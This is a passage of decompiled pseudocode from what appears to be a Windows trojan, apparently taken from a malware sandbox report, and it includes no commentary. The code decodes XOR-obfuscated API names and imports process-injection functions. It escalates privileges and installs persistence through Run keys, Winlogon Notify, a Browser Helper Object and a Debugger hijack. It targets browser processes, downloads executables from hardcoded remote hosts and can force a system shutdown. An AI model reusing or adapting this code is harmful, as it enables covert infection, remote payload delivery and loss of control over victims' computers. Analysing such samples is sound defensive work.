								_t1085 = "InternetOpenUrlA";
								while(1) {
									__eflags = _t1085 - 0x4105ef;
									if(_t1085 >= 0x4105ef) {
										break;
									}
									 *_t1085 =  *_t1085 ^ 0x000000d4;
									_t1085 =  &(_t1085[1]);
								}
								_t1086 = "InternetReadFile";
								while(1) {
									__eflags = _t1086 - 0x4105de;
									if(_t1086 >= 0x4105de) {
										break;
									}
									 *_t1086 =  *_t1086 ^ 0x000000d4;
									_t1086 =  &(_t1086[1]);
								}
								_t1087 = "InternetSetOptionA";
								while(1) {
									__eflags = _t1087 - 0x4105cd;
									if(_t1087 >= 0x4105cd) {
										break;
									}
									 *_t1087 =  *_t1087 ^ 0x000000d4;
									_t1087 =  &(_t1087[1]);
								}
								_t1088 = "InternetCloseHandle";
								while(1) {
									__eflags = _t1088 - 0x4105ba;
									if(_t1088 >= 0x4105ba) {
										break;
									}
									 *_t1088 =  *_t1088 ^ 0x000000d4;
									_t1088 =  &(_t1088[1]);
								}
								 *0x4121d0 = GetProcAddress(_t1154, "InternetOpenA");
								 *0x4121e0 = GetProcAddress(_t1154, "InternetOpenUrlA");
								 *0x4121f0 = GetProcAddress(_t1154, "InternetReadFile");
								 *0x412200 = GetProcAddress(_t1154, "InternetSetOptionA");
								 *0x412210 = GetProcAddress(_t1154, "InternetCloseHandle");
								goto L127;
							}
							_t1099 = "GetIpAddrTable";
							while(1) {
								__eflags = _t1099 - 0x4106f4;
								if(_t1099 >= 0x4106f4) {
									break;
								}
								 *_t1099 =  *_t1099 ^ 0x000000d4;
								_t1099 =  &(_t1099[1]);
							}
							 *0x4121c0 = GetProcAddress(_t1153, "GetIpAddrTable");
							goto L86;
						}
						_t1101 = "RasEnumConnectionsA";
						while(1) {
							__eflags = _t1101 - 0x410715;
							if(_t1101 >= 0x410715) {
								break;
							}
							 *_t1101 =  *_t1101 ^ 0x000000d4;
							_t1101 =  &(_t1101[1]);
						}
						 *0x4121b0 = GetProcAddress(_t1152, "RasEnumConnectionsA");
						goto L77;
					}
					_t1104 = "CreateRemoteThread";
					while(1) {
						__eflags = _t1104 - 0x4107ce;
						if(_t1104 >= 0x4107ce) {
							break;
						}
						 *_t1104 =  *_t1104 ^ 0x000000d4;
						_t1104 =  &(_t1104[1]);
					}
					 *0x412260 = GetProcAddress(_t1148, "CreateRemoteThread");
					_t1106 = "ntdll.dll";
					while(1) {
						__eflags = _t1106 - 0x4107bb;
						if(_t1106 >= 0x4107bb) {
							break;
						}
						 *_t1106 =  *_t1106 ^ 0x000000d4;
						_t1106 =  &(_t1106[1]);
					}
					_t1107 = "NtAllocateVirtualMemory";
					while(1) {
						__eflags = _t1107 - 0x4107b1;
						if(_t1107 >= 0x4107b1) {
							break;
						}
						 *_t1107 =  *_t1107 ^ 0x000000d4;
						_t1107 =  &(_t1107[1]);
					}
					_t1108 = "NtWriteVirtualMemory";
					while(1) {
						__eflags = _t1108 - 0x410799;
						if(_t1108 >= 0x410799) {
							break;
						}
						 *_t1108 =  *_t1108 ^ 0x000000d4;
						_t1108 =  &(_t1108[1]);
					}
					_t1109 = "NtShutdownSystem";
					while(1) {
						__eflags = _t1109 - 0x410784;
						if(_t1109 >= 0x410784) {
							break;
						}
						 *_t1109 =  *_t1109 ^ 0x000000d4;
						_t1109 =  &(_t1109[1]);
					}
					_t1110 = "RtlAdjustPrivilege";
					while(1) {
						__eflags = _t1110 - 0x410773;
						if(_t1110 >= 0x410773) {
							break;
						}
						 *_t1110 =  *_t1110 ^ 0x000000d4;
						_t1110 =  &(_t1110[1]);
					}
					_t1111 = LoadLibraryA("ntdll.dll");
					_t1203 = _t1111;
					 *0x412220 = GetProcAddress(_t1111, "NtAllocateVirtualMemory");
					 *0x412230 = GetProcAddress(_t1203, "NtWriteVirtualMemory");
					 *0x412240 = GetProcAddress(_t1203, "NtShutdownSystem");
					_t1115 = GetProcAddress(_t1203, "RtlAdjustPrivilege");
					 *0x412250 = _t1115;
					__eflags = _t1115;
					_t1217 = _t1115;
					if(_t1115 != 0) {
						RtlAdjustPrivilege(0x14, 1, 0, _t1299 + 0xa7); // executed
					}
					_t1116 = "NtOpenProcessToken";
					while(1) {
						__eflags = _t1116 - 0x410760;
						if(_t1116 >= 0x410760) {
							break;
						}
						 *_t1116 =  *_t1116 ^ 0x000000d4;
						_t1116 =  &(_t1116[1]);
					}
					_t1117 = "NtQueryInformationToken";
					while(1) {
						__eflags = _t1117 - 0x41074d;
						if(_t1117 >= 0x41074d) {
							break;
						}
						 *_t1117 =  *_t1117 ^ 0x000000d4;
						_t1117 =  &(_t1117[1]);
					}
					_t1118 = GetProcAddress(_t1203, "NtOpenProcessToken");
					__eflags = _t1118;
					_t1293 = _t1118;
					if(_t1118 == 0) {
						goto L68;
					}
					_t1119 = GetProcAddress(_t1203, "NtQueryInformationToken");
					__eflags = _t1119;
					_t1269 = _t1119;
					if(_t1119 == 0) {
						goto L68;
					}
					_t1121 =  *_t1293(0xffffffff, 8, _t1299 + 0xa0);
					__eflags = _t1121;
					if(_t1121 < 0) {
						goto L68;
					}
					_t1294 = _t1299 + 0x9c;
					_t1123 = E00401000(0x2000);
					_t1204 = _t1123;
					_t1124 =  *_t1269( *(_t1299 + 0xb0), 2, _t1123, 0x2000, _t1294); // executed
					__eflags = _t1124;
					if(_t1124 < 0) {
						L60:
						E00401029(_t1204);
						CloseHandle( *(_t1299 + 0xa0)); // executed
						goto L68;
					}
					 *(_t1299 + 0x34) = 0;
					_t1207 =  *_t1204;
					while(1) {
						__eflags =  *(_t1299 + 0x34) - _t1207;
						if( *(_t1299 + 0x34) >= _t1207) {
							goto L60;
						}
						_t1217 =  *(_t1299 + 0x34);
						_t1128 = _t1204[8 + _t1217 * 8];
						__eflags = _t1128 & 0x00000004;
						if((_t1128 & 0x00000004) == 0) {
							L59:
							 *(_t1299 + 0x34) =  *(_t1299 + 0x34) + 1;
							continue;
						}
						__eflags = _t1128 & 0x00000010;
						if((_t1128 & 0x00000010) != 0) {
							goto L59;
						}
						_t1217 = _t1204[4 + _t1217 * 8];
						_t1130 =  *((intOrPtr*)(_t1217 + 4 + ( *(_t1217 + 1) & 0x000000ff) * 4));
						__eflags = _t1130 - 0x220;
						if(__eflags == 0) {
							L54:
							 *(_t1299 + 0xb) = 0;
							 *0x412020 = 1; // executed
							_t1131 =  *_t1269( *(_t1299 + 0xb0), 1, _t1204, 0x2000, _t1294); // executed
							__eflags = _t1131;
							if(_t1131 >= 0) {
								_t1132 =  *_t1204;
								__eflags =  *((char*)(_t1132 + 1)) - 1;
								if( *((char*)(_t1132 + 1)) == 1) {
									__eflags =  *((intOrPtr*)(_t1132 + 8)) - 0x12;
									if( *((intOrPtr*)(_t1132 + 8)) == 0x12) {
										 *(_t1299 + 0xb) = 1;
									}
								}
							}
							_t1217 =  *(_t1299 + 0xb) & 0x000000ff;
							 *0x412010 = _t1217;
							goto L60;
						}
						if(__eflags > 0) {
							__eflags = _t1130 - 0x223;
						} else {
							__eflags = _t1130 - 0x200;
						}
						if(__eflags != 0) {
							goto L59;
						} else {
							goto L54;
						}
					}
					goto L60;
				} else {
					_t1135 = CreateToolhelp32Snapshot(2, 0);
					 *(_t1299 + 0xa0) = _t1135;
					__eflags = _t1135;
					if(_t1135 == 0) {
						L447:
						ExitProcess(0); // executed
						L448:
						 *0x412000 = 1;
						L449:
						_t597 = CreateFileA(_t1299 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
						 *(_t1299 + 0xa0) = _t597;
						__eflags = _t597;
						if(_t597 == 0) {
							L452:
							 *(_t1299 + 0x14) = 0;
							_t1296 = 0;
							__eflags = 0;
							L453:
							CloseHandle(CreateThread(0, 0x1000, E00401038, _t1299 + 0x1570, 0, _t1299 + 0x9c));
							_t602 = 0x408720;
							while(1) {
								__eflags = _t602 - 0x408776;
								if(_t602 >= 0x408776) {
									break;
								}
								 *_t602 =  *_t602 ^ 0x000000d4;
								_t602 =  &(_t602[1]);
							}
							while(1) {
								__eflags = 0x407b20 - 0x408720;
								if(0x407b20 >= 0x408720) {
									break;
								}
								 *0x407b20 =  *0x407b20 ^ 0x0000004d;
								__eflags =  *0x407b20;
								 *(_t1296 + 0x40) =  *(_t1296 + 0x40) ^ _t1207;
							}
							__eflags =  *0x412100 - 2;
							if( *0x412100 != 2) {
								L485:
								 *(_t1299 + 0x78) = 0x10;
								_t1156 = _t1299 + 0x1ec;
								_t605 = GetComputerNameA(_t1156, _t1299 + 0x78);
								__eflags = _t605;
								if(_t605 == 0) {
									L487:
									_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
									_push(_t1299 + 0x1bc);
									L00405E20();
									L491:
									wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1299 + 0x1f4)),  *((char*)(_t1299 + 0x1f1)),  *((char*)(_t1299 + 0x1ee)),  *((char*)(_t1299 + 0x1eb)),  *((char*)(_t1299 + 0x1e8)),  *((char*)(_t1299 + 0x1e5)),  *((char*)(_t1299 + 0x1e2)),  *((char*)(_t1299 + 0x1df)),  *((char*)(_t1299 + 0x1dc)),  *((char*)(_t1299 + 0x1d9)),  *((char*)(_t1299 + 0x1d6)),  *((char*)(_t1299 + 0x1d3)),  *((char*)(_t1299 + 0x1d0)),  *((char*)(_t1299 + 0x1cd)),  *((char*)(_t1299 + 0x1ca)),  *((char*)(_t1299 + 0x1c7)));
									_t1300 = _t1299 + 0x48;
									_t624 = 0x407aa0;
									while(1) {
										__eflags = _t624 - 0x407ad5;
										if(_t624 >= 0x407ad5) {
											break;
										}
										 *_t624 =  *_t624 ^ 0x000000d4;
										_t624 =  &(_t624[1]);
									}
									while(1) {
										__eflags = 0x4072a0 - 0x407aa0;
										if(0x4072a0 >= 0x407aa0) {
											break;
										}
										 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
										__eflags =  *0x4072a0;
										 *(_t1296 + 0x40) =  *(_t1296 + 0x40) ^ _t1207;
									}
									_push(0x4122b0);
									_push(0x407aa0);
									_t1157 =  &(_t1300[0x410]);
									_push(_t1157);
									L00405E20();
									_push(0x4072a0);
									L00405E30();
									_t627 = RegCreateKeyA(0x80000002, _t1157,  &(_t1300[0x26]));
									__eflags = _t627;
									if(_t627 != 0) {
										L522:
										_t629 = E004030DE( &(_t1300[0x1ee]));
										_t1300[0x26] = _t629;
										__eflags = _t629;
										if(_t629 == 0) {
											L542:
											_t630 = E004010B2();
											__eflags = _t630;
											_t1223 = _t630;
											if(_t630 == 0) {
												_t1223 = 0x42;
											}
											_t1300[0x1ee] = _t1223;
											_t631 = E004010B2();
											__eflags = _t631;
											_t1224 = _t631;
											if(_t631 == 0) {
												_t1224 = 0x4d;
											}
											_t1300[0x162] = _t1224;
											_push( *0x4120b0);
											_push( &(_t1300[0x163]));
											L00405E20();
											_push( &(_t1300[0x55a]));
											_push( &(_t1300[0x1ac]));
											L00405E20();
											_t1270 = _t1300[5];
											_t635 = _t1270 + _t1296;
											while(1) {
												__eflags = _t1270 - _t635;
												if(_t1270 >= _t635) {
													break;
												}
												 *_t1270 =  *_t1270 ^ _t1300[0x162] & 0x000000ff;
												_t1270 =  &(_t1270[0]);
												_t635 = _t1300[5] + _t1296;
											}
											_t1158 =  &(_t1300[0x517]);
											_t636 = ExpandEnvironmentStringsA("%AppData%\\", _t1158, 0x104);
											__eflags = _t636;
											if(_t636 == 0) {
												L553:
												_t1159 =  &(_t1300[0x516]);
												_t637 = GetTempPathA(0x104, _t1159);
												__eflags = _t637;
												if(_t637 == 0) {
													L561:
													E00401029(_t1300[5]);
													_t1160 =  &(_t1300[0x387]);
													_t640 = GetSystemDirectoryA(_t1160, 0x104);
													_push(0x80);
													_push( *0x4120c0);
													_push(0x41103e);
													_push(_t1160);
													L00405E30();
													L00405E30();
													SetFileAttributesA(_t640, _t640);
													_t642 = CreateFileA(_t1160, 0x40000000, 0, 0, 2, 0x80, 0);
													_t1300[0x28] = _t642;
													__eflags = _t642;
													if(_t642 == 0) {
														L568:
														_t643 = GetLastError();
														__eflags = _t643 - 0x20;
														if(_t643 != 0x20) {
															_t1161 =  &(_t1300[0x387]);
															_t644 = ExpandEnvironmentStringsA("%AppData%\\", _t1161, 0x104);
															_push(0x80);
															_push( *0x4120c0);
															L00405E30();
															SetFileAttributesA(_t644, _t1161);
															_t646 = CreateFileA(_t1161, 0x40000000, 0, 0, 2, 0x80, 0);
															_t1300[0x28] = _t646;
															__eflags = _t646;
															if(_t646 == 0) {
																L572:
																_t647 = GetLastError();
																__eflags = _t647 - 0x20;
																if(_t647 == 0x20) {
																	goto L569;
																}
																_t818 = GetTempPathA(0x104, _t1161);
																_push(0x80);
																_push( *0x4120c0);
																L00405E30();
																SetFileAttributesA(_t818, _t1161);
																_t820 = CreateFileA(_t1161, 0x40000000, 0, 0, 2, 0x80, 0);
																_t1300[0x28] = _t820;
																__eflags = _t820;
																if(_t820 == 0) {
																	L575:
																	_t821 = GetLastError();
																	__eflags = _t821 - 0x20;
																	if(_t821 == 0x20) {
																		goto L569;
																	}
																	L578:
																	_t1162 =  &(_t1300[0x343]);
																	_t652 = ExpandEnvironmentStringsA("%AppData%\\", _t1162, 0x104);
																	_push(0x80);
																	_push( *0x4120d0);
																	L00405E30();
																	SetFileAttributesA(_t652, _t1162);
																	_t654 = CreateFileA(_t1162, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t1300[0x28] = _t654;
																	__eflags = _t654;
																	_t1225 = _t654;
																	if(_t654 == 0) {
																		L580:
																		_t1163 =  &(_t1300[0x342]);
																		_t655 = GetTempPathA(0x104, _t1163);
																		_push(0x80);
																		_push( *0x4120d0);
																		L00405E30();
																		SetFileAttributesA(_t655, _t1163);
																		_t657 = CreateFileA(_t1163, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t1300[0x28] = _t657;
																		__eflags = _t657;
																		_t1225 = _t657;
																		if(_t657 == 0) {
																			L583:
																			_t1300[0x342] = 0;
																			L584:
																			__eflags = _t1300[0x342];
																			if(_t1300[0x342] != 0) {
																				CreateFileA( &(_t1300[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																			}
																			_t1164 =  &(_t1300[0x2b]);
																			GetSystemDirectoryA(_t1164, 0x104);
																			_push(0x41103e);
																			_push(_t1164);
																			L00405E30();
																			E004012C2(_t1164);
																			ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t1164, 0x104);
																			E004012C2(_t1164);
																			ExpandEnvironmentStringsA("%AppData%\\", _t1164, 0x104);
																			E004012C2(_t1164);
																			_t667 = 0x407220;
																			while(1) {
																				__eflags = _t667 - 0x40724d;
																				if(_t667 >= 0x40724d) {
																					break;
																				}
																				 *_t667 =  *_t667 ^ 0x000000d4;
																				_t667 =  &(_t667[1]);
																			}
																			_t668 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t1300[0x26]));
																			__eflags = _t668;
																			if(_t668 == 0) {
																				L591:
																				__eflags = _t1300[0xb];
																				if(_t1300[0xb] == 0) {
																					_t1177 =  &(_t1300[0x55a]);
																					_t808 = E00401251(_t1300[0x26]);
																					_push(_t1177);
																					L00405E40();
																					_t809 = _t808 + 1;
																					__eflags = _t809;
																					RegSetValueExA(_t1300[0x2b],  *0x4120b0, 0, 1, _t1177, _t809);
																				}
																				RegDeleteValueA(_t1300[0x27], "winrnt.exe");
																				RegCloseKey(_t1300[0x26]);
																				L594:
																				__eflags =  *0x412100 - 2;
																				if( *0x412100 != 2) {
																					L634:
																					CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1300[0x27])));
																					_t673 = 0x407000;
																					while(1) {
																						__eflags = _t673 - 0x407060;
																						if(_t673 >= 0x407060) {
																							break;
																						}
																						 *_t673 =  *_t673 ^ 0x000000d4;
																						_t673 =  &(_t673[1]);
																					}
																					_t1300[0xc] = 0;
																					while(1) {
																						E004011CF(0x80000002, 0x407000);
																						__eflags = _t1300[0xc] - 9;
																						if(_t1300[0xc] <= 9) {
																							goto L673;
																						}
																						L639:
																						_t1300[0x16] = 0;
																						_t1300[0x17] = 0;
																						_t732 = E004025C3();
																						__eflags = _t732;
																						if(_t732 != 0) {
																							L670:
																							 *_t1300 = 0;
																							L674:
																							_t1300[0xd] = 0x3b;
																							do {
																								__eflags = _t1300[0x342];
																								if(_t1300[0x342] != 0) {
																									_push(0);
																									_push("opera.exe");
																									_push("seamonkey.exe");
																									_push("mozilla.exe");
																									_push("firefox.exe");
																									_push("iexplore.exe");
																									_push("explorer.exe");
																									E0040318D( &(_t1300[0x349]));
																									_t1300 =  &(_t1300[8]);
																								}
																								__eflags = _t1300[0xa];
																								if(_t1300[0xa] != 0) {
																									_t1168 =  &(_t1300[0x3cb]);
																									SetFileAttributesA(_t1168, 0x21);
																									_t709 = RegCreateKeyA(0x80000002,  &(_t1300[0x40f]),  &(_t1300[0x26]));
																									__eflags = _t709;
																									if(_t709 == 0) {
																										E00401251(_t1300[0x26]);
																										_t1300[0x27] = 1;
																										_t713 = RegSetValueExA(_t1300[0x2b], "IsInstalled", 0, 4,  &(_t1300[0x28]), 4);
																										_push(_t1168);
																										L00405E40();
																										_t714 = _t713 + 1;
																										__eflags = _t714;
																										RegSetValueExA(_t1300[0x2b], "StubPath", 0, 1, _t1168, _t714);
																										RegCloseKey(_t1300[0x26]);
																									}
																								}
																								__eflags = _t1300[0xb];
																								_t1271 =  &(_t1300[0x26]);
																								if(_t1300[0xb] == 0) {
																									_t676 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t1271);
																									__eflags = _t676;
																									if(_t676 == 0) {
																										L685:
																										_t1165 =  &(_t1300[0x55a]);
																										_push(_t1165);
																										L00405E40();
																										_t677 = _t676 + 1;
																										__eflags = _t677;
																										_push(_t677);
																										_push(_t1165);
																										_push(1);
																										_push(0);
																										_push( *0x4120b0);
																										L686:
																										RegSetValueExA(_t1300[0x2b], ??, ??, ??, ??, ??);
																										RegCloseKey(_t1300[0x26]);
																										L687:
																										__eflags = _t1300[9];
																										if(_t1300[9] == 0) {
																											goto L697;
																										}
																										_t1166 =  &(_t1300[0x27]);
																										_t684 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1166, 0);
																										__eflags = _t684;
																										if(_t684 == 0) {
																											L690:
																											RegSetValueExA(_t1300[0x2b], "SubshellState", 0, 3,  &(_t1300[0x1ef]), 0x22a);
																											RegCloseKey(_t1300[0x26]);
																											L691:
																											_t1167 =  &(_t1300[0x387]);
																											SetFileAttributesA(_t1167, 0x21);
																											__eflags =  *0x412100 - 2;
																											_t1274 =  &(_t1300[0x26]);
																											if( *0x412100 != 2) {
																												_t689 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t1274);
																												__eflags = _t689;
																												if(_t689 != 0) {
																													goto L697;
																												}
																												_push(_t1167);
																												L00405E40();
																												RegSetValueExA(_t1300[0x2b], 0, 0, 1, _t1167, _t689 + 1);
																												RegSetValueExA(_t1300[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																												RegCloseKey(_t1300[0x26]);
																												_t694 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t1274);
																												__eflags = _t694;
																												if(_t694 != 0) {
																													goto L697;
																												}
																												L696:
																												RegCloseKey(_t1300[0x26]);
																												goto L697;
																											}
																											_t696 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t1274);
																											__eflags = _t696;
																											if(_t696 != 0) {
																												goto L697;
																											}
																											_t698 = E00401251(_t1300[0x26]);
																											_push(_t1167);
																											L00405E40();
																											RegSetValueExA(_t1300[0x2b], "DLLName", 0, 1, _t1167, _t698 + 1);
																											RegSetValueExA(_t1300[0x2b], "Startup", 0, 1, "Startup", 8);
																											goto L696;
																										}
																										_t702 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1166, 0);
																										__eflags = _t702;
																										if(_t702 != 0) {
																											goto L691;
																										}
																										goto L690;
																									}
																									_t676 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t1271);
																									__eflags = _t676;
																									if(_t676 != 0) {
																										goto L687;
																									}
																									goto L685;
																								}
																								_t1169 =  &(_t1300[0x48f]);
																								SetFileAttributesA(_t1169, 0x21);
																								_t683 = RegCreateKeyA(0x80000002, 0x408720, _t1271);
																								__eflags = _t683;
																								if(_t683 != 0) {
																									goto L687;
																								}
																								_t704 = E00401251(_t1300[0x26]);
																								_push(_t1169);
																								L00405E40();
																								_push(_t704 + 1);
																								_push(_t1169);
																								_push(1);
																								_push(0);
																								_push("Debugger");
																								goto L686;
																								L697:
																								SetFileAttributesA( &(_t1300[0x55b]), 0x21);
																								Sleep(0x3e8);
																								_t471 =  &(_t1300[0xd]);
																								 *_t471 = _t1300[0xd] - 1;
																								__eflags =  *_t471;
																							} while ( *_t471 >= 0);
																							L698:
																							_t720 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1300[0x12]), 0);
																							__eflags = _t720;
																							if(_t720 != 0) {
																								do {
																									E004011CF(0x80000002, 0x407000);
																									__eflags = _t1300[0xc] - 9;
																									if(_t1300[0xc] <= 9) {
																										goto L673;
																									}
																									goto L639;
																								} while (_t720 != 0);
																							}
																							_t1300[0x10] = 4;
																							_t1173 =  &(_t1300[0x10]);
																							_t722 = RegQueryValueExA(_t1300[0x16], "g00d d0gg", 0, 0, _t1173,  &(_t1300[0x10]));
																							__eflags = _t722;
																							if(_t722 == 0) {
																								_t725 = _t1300[0xf] - 1;
																								__eflags = _t725;
																								_t1300[0xf] = _t725;
																								if(_t725 == 0) {
																									RegDeleteValueA(_t1300[0x12], "g00d d0gg");
																									Sleep(0x1388);
																									__eflags =  *0x412100 - 2;
																									if( *0x412100 != 2) {
																										ExitWindowsEx(6, 0);
																									} else {
																										RtlAdjustPrivilege(0x13, 1, 0,  &(_t1300[0xe]));
																										 *0x412240(1);
																									}
																								} else {
																									RegSetValueExA(_t1300[0x16], "g00d d0gg", 0, 4, _t1173, 4);
																								}
																							}
																							RegCloseKey(_t1300[0x11]);
																							continue;
																						}
																						_t734 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1300[0x1c]), 0);
																						__eflags = _t734;
																						if(_t734 != 0) {
																							__eflags =  *_t1300;
																							if( *_t1300 == 0) {
																								goto L674;
																							}
																							L672:
																							_t1300[0xc] = 0;
																							goto L674;
																						}
																						_t1297 =  &(_t1300[0x19]);
																						GetSystemTimeAsFileTime(_t1297);
																						_t1300[0x18] = 8;
																						_t1263 =  &(_t1300[0x17]);
																						_t736 = RegQueryValueExA(_t1300[0x20], "ConnPred", 0,  &(_t1300[0x17]), _t1263,  &(_t1300[0x18]));
																						__eflags = _t736;
																						if(_t736 != 0) {
																							L643:
																							__eflags = E004014D8(_t1297, 0x412070) - 0x4af;
																							if(__eflags <= 0) {
																								L654:
																								__eflags =  *0x412080;
																								if( *0x412080 == 0) {
																									L657:
																									_t1300[0x18] = 8;
																									__eflags = RegQueryValueExA(_t1300[0x20], "UseExtProfile", 0,  &(_t1300[0x17]), _t1263,  &(_t1300[0x18]));
																									if(__eflags != 0) {
																										L659:
																										_t741 = E00402427(__eflags);
																										__eflags = _t741;
																										if(_t741 != 0) {
																											L669:
																											RegCloseKey(_t1300[0x1b]);
																											goto L670;
																										}
																										_push(1);
																										_push(0);
																										_t744 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																										__eflags = _t744;
																										if(_t744 == 0) {
																											L662:
																											_t1300[0x18] = 8;
																											_t1171 =  &(_t1300[0x13]);
																											_t746 = RegQueryValueExA(_t1300[0x20], "UseDflProfile", 0,  &(_t1300[0x17]),  &(_t1300[0x13]),  &(_t1300[0x18]));
																											__eflags = _t746;
																											if(_t746 != 0) {
																												_t755 = _t1300[0x16] + 0x1162f100;
																												__eflags = _t755;
																												asm("adc edx, 0xffffff9b");
																												_t1300[0x12] = _t755;
																												_t1300[0x13] = _t1300[0x17];
																											}
																											__eflags = E004014D8( &(_t1300[0x19]), _t1171) - 0x152ab;
																											if(__eflags <= 0) {
																												goto L669;
																											}
																											_t749 = E00402427(__eflags);
																											__eflags = _t749;
																											if(_t749 != 0) {
																												goto L669;
																											}
																											_push(3);
																											_push(0);
																											_t751 = E0040211B("tombul.gif", 0);
																											__eflags = _t751;
																											if(_t751 == 0) {
																												goto L669;
																											}
																											_push(8);
																											_push(_t1297);
																											_push(0xb);
																											_push(0);
																											_push("UseDflProfile");
																											L668:
																											RegSetValueExA(_t1300[0x20], ??, ??, ??, ??, ??);
																											RegCloseKey(_t1300[0x1b]);
																											 *_t1300 = 1;
																											goto L672;
																										}
																										_t1300[0x16] = _t1300[0x19].dwLowDateTime;
																										_t1300[0x17] = _t1300[0x1a];
																										_push(8);
																										_push(_t1297);
																										_push(0xb);
																										_push(0);
																										_push("UseExtProfile");
																										goto L668;
																									}
																									__eflags = E004014D8( &(_t1300[0x19]),  &(_t1300[0x16])) - 0x152ab;
																									if(__eflags <= 0) {
																										goto L662;
																									}
																									goto L659;
																								}
																								_push(3);
																								_push(0);
																								_t760 = E0040211B("grazie.gif", 0);
																								__eflags = _t760;
																								if(_t760 == 0) {
																									goto L657;
																								}
																								_t1300[0x16] = _t1300[0x19].dwLowDateTime;
																								_t1300[0x17] = _t1300[0x1a];
																								_push(8);
																								_push(_t1297);
																								_push(0xb);
																								_push(0);
																								_push("ConnPred");
																								goto L668;
																							}
																							_t762 = E00402427(__eflags);
																							__eflags = _t762;
																							if(_t762 != 0) {
																								goto L669;
																							}
																							_t764 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																							_t1273 = 0;
																							__eflags = _t764;
																							_t1172 = _t764;
																							if(_t764 != 0) {
																								_t769 = E00401E00(_t764,  &(_t1300[0x15]), 2);
																								__eflags = _t769 - 2;
																								if(_t769 == 2) {
																									_t1273 = 1;
																								}
																							}
																							E00401F59(_t1172);
																							__eflags = _t1273;
																							if(_t1273 == 0) {
																								 *0x412080 = 0;
																								goto L654;
																							}
																							 *0x412070 = _t1300[0x19];
																							_t768 = 0;
																							__eflags = _t1300[0x14] - 0x49;
																							 *0x412074 = _t1300[0x1a];
																							if(_t1300[0x14] == 0x49) {
																								__eflags = _t1300[0x14] - 0x54;
																								if(_t1300[0x14] == 0x54) {
																									_t768 = 1;
																								}
																							}
																							 *0x412080 = _t768;
																							goto L654;
																						}
																						_t771 = E004014D8(_t1297, _t1263);
																						__eflags = _t771 - 0x152ab;
																						if(_t771 <= 0x152ab) {
																							goto L657;
																						}
																						goto L643;
																						L673:
																						_t434 =  &(_t1300[0xc]);
																						 *_t434 =  &(_t1300[0xc][1]);
																						__eflags =  *_t434;
																						goto L674;
																					}
																				}
																				_t772 = 0x4071e0;
																				while(1) {
																					__eflags = _t772 - 0x407214;
																					if(_t772 >= 0x407214) {
																						break;
																					}
																					 *_t772 =  *_t772 ^ 0x000000d4;
																					_t772 =  &(_t772[1]);
																				}
																				_t773 = 0x4071c3;
																				while(1) {
																					__eflags = _t773 - 0x4071cf;
																					if(_t773 >= 0x4071cf) {
																						break;
																					}
																					 *_t773 =  *_t773 ^ 0x000000d4;
																					_t773 =  &(_t773[1]);
																				}
																				_t1275 =  &(_t1300[0x26]);
																				_t774 = RegCreateKeyA(0x80000002, 0x4071e0, _t1275);
																				__eflags = _t774;
																				if(_t774 == 0) {
																					RegSetValueExA(_t1300[0x2b], 0x4071c3, 0, 4,  &(_t1300[0x28]), 4);
																					RegCloseKey(_t1300[0x26]);
																				}
																				_t775 = 0x4071a0;
																				while(1) {
																					__eflags = _t775 - 0x4071c2;
																					if(_t775 >= 0x4071c2) {
																						break;
																					}
																					 *_t775 =  *_t775 ^ 0x000000d4;
																					_t775 =  &(_t775[1]);
																				}
																				_t776 = 0x407177;
																				while(1) {
																					__eflags = _t776 - 0x407188;
																					if(_t776 >= 0x407188) {
																						break;
																					}
																					 *_t776 =  *_t776 ^ 0x000000d4;
																					_t776 =  &(_t776[1]);
																				}
																				_t777 = 0x407160;
																				while(1) {
																					__eflags = _t777 - 0x407176;
																					if(_t777 >= 0x407176) {
																						break;
																					}
																					 *_t777 =  *_t777 ^ 0x000000d4;
																					_t777 =  &(_t777[1]);
																				}
																				_t778 = 0x40714a;
																				while(1) {
																					__eflags = _t778 - 0x40715f;
																					if(_t778 >= 0x40715f) {
																						break;
																					}
																					 *_t778 =  *_t778 ^ 0x000000d4;
																					_t778 =  &(_t778[1]);
																				}
																				_t779 = 0x407135;
																				while(1) {
																					__eflags = _t779 - 0x407149;
																					if(_t779 >= 0x407149) {
																						break;
																					}
																					 *_t779 =  *_t779 ^ 0x000000d4;
																					_t779 =  &(_t779[1]);
																				}
																				_t780 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t1275);
																				__eflags = _t780;
																				if(_t780 == 0) {
																					_t1176 =  &(_t1300[0x28]);
																					RegSetValueExA(_t1300[0x2b], 0x407177, 0, 4, _t1176, 4);
